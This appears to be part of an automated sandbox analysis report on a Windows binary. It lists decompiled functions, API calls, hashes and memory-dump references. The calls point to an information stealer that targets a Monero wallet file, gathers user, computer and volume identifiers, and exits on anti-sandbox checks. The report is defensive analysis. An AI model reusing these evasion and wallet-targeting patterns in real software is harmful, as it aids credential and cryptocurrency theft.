                                • API String ID: 2238633743-1775429166
                                • Opcode ID: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                • Instruction ID: 191d0d4bae6f16a54aede8f015aa2c696e7153d6488983568b3224a9246f26f6
                                • Opcode Fuzzy Hash: c3bd9a9a67b15c39f075053cc835c43c0d28ec1fd49f2dcc80478b9d0b3aca6e
                                • Instruction Fuzzy Hash: 5E624AB5504201AFD348DFAAED8995E37F9F7C820171C853AE61DE3224D63998C9DB13
                                Function 00C45510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 858 c45510-c45577 call c45ad0 call c4a820 * 3 call c4a740 * 4 874 c4557c-c45583 858->874 875 c45585-c455b6 call c4a820 call c4a7a0 call c31590 call c451f0 874->875 876 c455d7-c4564c call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 874->876 892 c455bb-c455d2 call c4a8a0 call c4a800 875->892 902 c45693-c456a9 call c4aad0 StrCmpCA 876->902 905 c4564e-c4568e call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 876->905 892->902 907 c457dc-c45844 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 902->907 908 c456af-c456b6 902->908 905->902 1039 c45ac3-c45ac6 907->1039 910 c456bc-c456c3 908->910 911 c457da-c4585f call c4aad0 StrCmpCA 908->911 914 c456c5-c45719 call c4a820 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 910->914 915 c4571e-c45793 call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 910->915 929 c45865-c4586c 911->929 930 c45991-c459f9 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 911->930 914->911 915->911 1018 c45795-c457d5 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 915->1018 935 c45872-c45879 929->935 936 c4598f-c45a14 call c4aad0 StrCmpCA 929->936 930->1039 943 c458d3-c45948 call c4a740 * 2 call c31590 call c452c0 call c4a8a0 call c4a800 call c4aad0 StrCmpCA 935->943 944 c4587b-c458ce call c4a820 call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 935->944 965 c45a16-c45a21 Sleep 936->965 966 c45a28-c45a91 call c4a8a0 call c4a820 * 2 call c31670 call c4a800 * 4 call c46560 call c31550 936->966 943->936 1044 c4594a-c4598a call c4a7a0 call c31590 call c451f0 call c4a8a0 call c4a800 943->1044 944->936 965->874 966->1039 1018->911 1044->936
                                APIs
                                  • Part of subcall function 00C4A820: lstrlen.KERNEL32(00C34F05,?,?,00C34F05,00C50DDE), ref: 00C4A82B
                                  • Part of subcall function 00C4A820: lstrcpy.KERNEL32(00C50DDE,00000000), ref: 00C4A885
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C456A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45857
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                  • Part of subcall function 00C452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45318
                                  • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C4532F
                                  • Part of subcall function 00C452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00C45364
                                  • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C45383
                                  • Part of subcall function 00C452C0: lstrlen.KERNEL32(00000000), ref: 00C453AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C4578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00C45940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00C45A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                • Instruction ID: c8a9da924e0a793bb80128a22b504f5d64081eca1e2fb0f7bf29fddeea04b1d2
                                • Opcode Fuzzy Hash: 28ca5fe1dee37807d923bde4d3d99bcd04d412a287ff74fd70a68797628a0f84
                                • Instruction Fuzzy Hash: B2E120729501049BEB14FBB1DC96AED7378FF94300F548128B906A61D2EF346B4DEB92
                                Function 00C417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1069 c417a0-c417cd call c4aad0 StrCmpCA 1072 c417d7-c417f1 call c4aad0 1069->1072 1073 c417cf-c417d1 ExitProcess 1069->1073 1077 c417f4-c417f8 1072->1077 1078 c419c2-c419cd call c4a800 1077->1078 1079 c417fe-c41811 1077->1079 1080 c41817-c4181a 1079->1080 1081 c4199e-c419bd 1079->1081 1083 c41821-c41830 call c4a820 1080->1083 1084 c418ad-c418be StrCmpCA 1080->1084 1085 c418cf-c418e0 StrCmpCA 1080->1085 1086 c4198f-c41999 call c4a820 1080->1086 1087 c41849-c41858 call c4a820 1080->1087 1088 c41835-c41844 call c4a820 1080->1088 1089 c41970-c41981 StrCmpCA 1080->1089 1090 c418f1-c41902 StrCmpCA 1080->1090 1091 c41951-c41962 StrCmpCA 1080->1091 1092 c41932-c41943 StrCmpCA 1080->1092 1093 c41913-c41924 StrCmpCA 1080->1093 1094 c4185d-c4186e StrCmpCA 1080->1094 1095 c4187f-c41890 StrCmpCA 1080->1095 1081->1077 1083->1081 1097 c418c0-c418c3 1084->1097 1098 c418ca 1084->1098 1099 c418e2-c418e5 1085->1099 1100 c418ec 1085->1100 1086->1081 1087->1081 1088->1081 1110 c41983-c41986 1089->1110 1111 c4198d 1089->1111 1101 c41904-c41907 1090->1101 1102 c4190e 1090->1102 1107 c41964-c41967 1091->1107 1108 c4196e 1091->1108 1105 c41945-c41948 1092->1105 1106 c4194f 1092->1106 1103 c41926-c41929 1093->1103 1104 c41930 1093->1104 1116 c41870-c41873 1094->1116 1117 c4187a 1094->1117 1118 c41892-c4189c 1095->1118 1119 c4189e-c418a1 1095->1119 1097->1098 1098->1081 1099->1100 1100->1081 1101->1102 1102->1081 1103->1104 1104->1081 1105->1106 1106->1081 1107->1108 1108->1081 1110->1111 1111->1081 1116->1117 1117->1081 1120 c418a8 1118->1120 1119->1120 1120->1081
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00C417C5
                                • ExitProcess.KERNEL32 ref: 00C417D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: d13e92a9da1a152f91134d159d41adcb7278a955d9908e3770b230de7f83cf42
                                • Instruction ID: f0e61746c013d561aba712d3598ef19affe22111b6b03be13f0210898e39f3e1
                                • Opcode Fuzzy Hash: d13e92a9da1a152f91134d159d41adcb7278a955d9908e3770b230de7f83cf42
                                • Instruction Fuzzy Hash: 8C517DB4B1020AEFDB04DFA1D958ABE77B5BF54304F188058E856A7340D770EA85DB62
                                Function 00C47500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1124 c47500-c4754a GetWindowsDirectoryA 1125 c47553-c475c7 GetVolumeInformationA call c48d00 * 3 1124->1125 1126 c4754c 1124->1126 1133 c475d8-c475df 1125->1133 1126->1125 1134 c475e1-c475fa call c48d00 1133->1134 1135 c475fc-c47617 GetProcessHeap RtlAllocateHeap 1133->1135 1134->1133 1137 c47628-c47658 wsprintfA call c4a740 1135->1137 1138 c47619-c47626 call c4a740 1135->1138 1145 c4767e-c4768e 1137->1145 1138->1145
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C47542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C4760A
                                • wsprintfA.USER32 ref: 00C47640
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                • Instruction ID: 8864a380c80d597f0689d3954f7338c9ce638ba41ffa57624df576df4a0c8196
                                • Opcode Fuzzy Hash: fd550e18fbedb16aeaef8178e618a040a0714ffa9945cd195727e52e6d8ae253
                                • Instruction Fuzzy Hash: A64181B1D04248AFDB10DF94DC45BEEBBB8BF48704F144199F50977280D7786A88CBA5
                                Function 00C469F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1750), ref: 00C498A1
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1768), ref: 00C498BA
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1600), ref: 00C498D2
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1780), ref: 00C498EA
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F15A0), ref: 00C49903
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F8AB8), ref: 00C4991B
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019E52E8), ref: 00C49933
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019E5228), ref: 00C4994C
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F15E8), ref: 00C49964
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F17C8), ref: 00C4997C
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1630), ref: 00C49995
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1660), ref: 00C499AD
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019E5368), ref: 00C499C5
                                  • Part of subcall function 00C49860: GetProcAddress.KERNEL32(77190000,019F1690), ref: 00C499DE
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C311D0: ExitProcess.KERNEL32 ref: 00C31211
                                  • Part of subcall function 00C31160: GetSystemInfo.KERNEL32(?), ref: 00C3116A
                                  • Part of subcall function 00C31160: ExitProcess.KERNEL32 ref: 00C3117E
                                  • Part of subcall function 00C31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                  • Part of subcall function 00C31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                  • Part of subcall function 00C31110: ExitProcess.KERNEL32 ref: 00C31143
                                  • Part of subcall function 00C31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                  • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31258
                                  • Part of subcall function 00C31220: __aulldiv.LIBCMT ref: 00C31266
                                  • Part of subcall function 00C31220: ExitProcess.KERNEL32 ref: 00C31294
                                  • Part of subcall function 00C46770: GetUserDefaultLangID.KERNEL32 ref: 00C46774
                                  • Part of subcall function 00C31190: ExitProcess.KERNEL32 ref: 00C311C6
                                  • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                  • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                  • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                  • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                  • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                  • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                • Sleep.KERNEL32(00001770), ref: 00C46B04
                                • CloseHandle.KERNEL32(?,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                • ExitProcess.KERNEL32 ref: 00C46B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                • Instruction ID: 67eedbd294ded08dfa2f935ab88f88d1ca792c4d6e80b52b3e6855ae854e104b
                                • Opcode Fuzzy Hash: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                • Instruction Fuzzy Hash: C4312870950208ABEB04FBF1DC56BEE7778BF54301F144528F612A21C2DF706A45EAA6
                                Function 00C31220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1204 c31220-c31247 call c489b0 GlobalMemoryStatusEx 1207 c31273-c3127a 1204->1207 1208 c31249-c31271 call c4da00 * 2 1204->1208 1210 c31281-c31285 1207->1210 1208->1210 1212 c31287 1210->1212 1213 c3129a-c3129d 1210->1213 1215 c31292-c31294 ExitProcess 1212->1215 1216 c31289-c31290 1212->1216 1216->1213 1216->1215
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                • __aulldiv.LIBCMT ref: 00C31258
                                • __aulldiv.LIBCMT ref: 00C31266
                                • ExitProcess.KERNEL32 ref: 00C31294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                • Instruction ID: 827dfd3257df782781c07b994c4be162951b7d82001af821b1c773ef57daae02
                                • Opcode Fuzzy Hash: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                • Instruction Fuzzy Hash: 3C016DB0D50308BEEB10EFE0DC49B9EBB78BB54705F288058EB05B62C0D77556459B99
                                Function 00C46AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1218 c46af3 1219 c46b0a 1218->1219 1221 c46b0c-c46b22 call c46920 call c45b10 CloseHandle ExitProcess 1219->1221 1222 c46aba-c46ad7 call c4aad0 OpenEventA 1219->1222 1228 c46af5-c46b04 CloseHandle Sleep 1222->1228 1229 c46ad9-c46af1 call c4aad0 CreateEventA 1222->1229 1228->1219 1229->1221
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                • Sleep.KERNEL32(00001770), ref: 00C46B04
                                • CloseHandle.KERNEL32(?,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                • ExitProcess.KERNEL32 ref: 00C46B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                • Instruction ID: c17c8fc7fd6d950a1b9e7ee261f4348e56015d41bcc0d20ee3862ea7cc09cdf6
                                • Opcode Fuzzy Hash: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                • Instruction Fuzzy Hash: 31F05E70940219AFE700EBA1DC0ABBD7B74FB05701F144925F516B11C5CBB05584FA6B
                                Function 00C347B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
